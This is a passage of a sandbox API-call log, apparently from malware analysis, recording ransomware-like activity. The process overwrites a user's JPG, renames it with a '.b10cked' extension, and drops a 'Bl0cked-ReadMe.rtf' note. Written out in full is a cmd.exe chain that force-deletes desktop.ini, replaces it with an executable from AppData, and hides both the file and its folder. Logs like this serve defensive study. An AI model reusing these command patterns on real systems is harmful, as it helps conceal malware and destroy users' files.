oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.599] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount1=58, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount2=58) returned 2 [0144.599] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.599] ReleaseMutex (hMutex=0xf8) returned 1 [0144.599] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.599] ReleaseMutex (hMutex=0xf8) returned 1 [0144.599] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.599] ReleaseMutex (hMutex=0xf8) returned 1 [0144.599] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.599] ReleaseMutex (hMutex=0xf8) returned 1 [0144.599] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\QO_v_Iwy7B17SYlN-.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\qo_v_iwy7b17syln-.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20138850032) returned 1 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.601] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 
0xcf28 [0144.601] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0144.601] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xd410 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xd410 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.602] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6a07, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6a07, lpOverlapped=0x0) returned 1 [0144.602] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.602] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6a07, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6a07, lpOverlapped=0x0) returned 1 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=-27143, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6a09 [0144.602] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6a07, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6a07, lpOverlapped=0x0) returned 1 [0144.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=-27143, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6a09 [0144.603] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6a07, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6a07, lpOverlapped=0x0) returned 1 [0144.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QO_v_Iwy7B17SYlN-.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0144.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QO_v_Iwy7B17SYlN-.jpg", cchWideChar=21, lpMultiByteStr=0x13288fc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QO_v_Iwy7B17SYlN-.jpg", lpUsedDefaultChar=0x0) returned 21 [0144.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xd410 [0144.607] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, 
nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0144.607] CloseHandle (hObject=0x114) returned 1 [0144.608] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\QO_v_Iwy7B17SYlN-.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG") returned 0x2f [0144.608] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\") returned 0x23 [0144.608] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x9c0, dwThreadId=0x9b8)) returned 1 [0144.610] CloseHandle (hObject=0x110) returned 1 [0144.610] CloseHandle (hObject=0x114) returned 1 [0144.610] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\") returned 0x27 [0144.610] CharUpperBuffW 
(in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.610] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount2=58) returned 1 [0144.610] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\") returned 0x27 [0144.610] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0144.610] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0144.610] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0144.611] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0144.611] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0144.611] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\") returned 0x23 [0144.611] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0144.611] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0144.611] 
CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x9f4, dwThreadId=0x9dc)) returned 1 [0144.615] CloseHandle (hObject=0x110) returned 1 [0144.615] CloseHandle (hObject=0x114) returned 1 [0144.615] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\bl0cked-readme.rtf")) returned 0xffffffff [0144.616] GetLastError () returned 0x2 [0144.616] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0144.618] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\bl0cked-readme.rtf")) returned 0x20 [0144.618] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) 
returned 2 [0144.618] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0144.619] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0144.619] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0144.619] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0144.619] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0144.619] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0144.619] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\") returned 0x23 [0144.619] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0144.619] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0144.619] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1") returned 0x22 [0144.619] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0144.620] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0144.620] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, 
hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x954, dwThreadId=0x8a8)) returned 1 [0144.624] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0145.814] CloseHandle (hObject=0x114) returned 1 [0145.814] CloseHandle (hObject=0x110) returned 1 [0145.814] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.814] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0145.814] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0145.814] GetTickCount () returned 0x2d680 [0145.814] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20260357297) returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | 
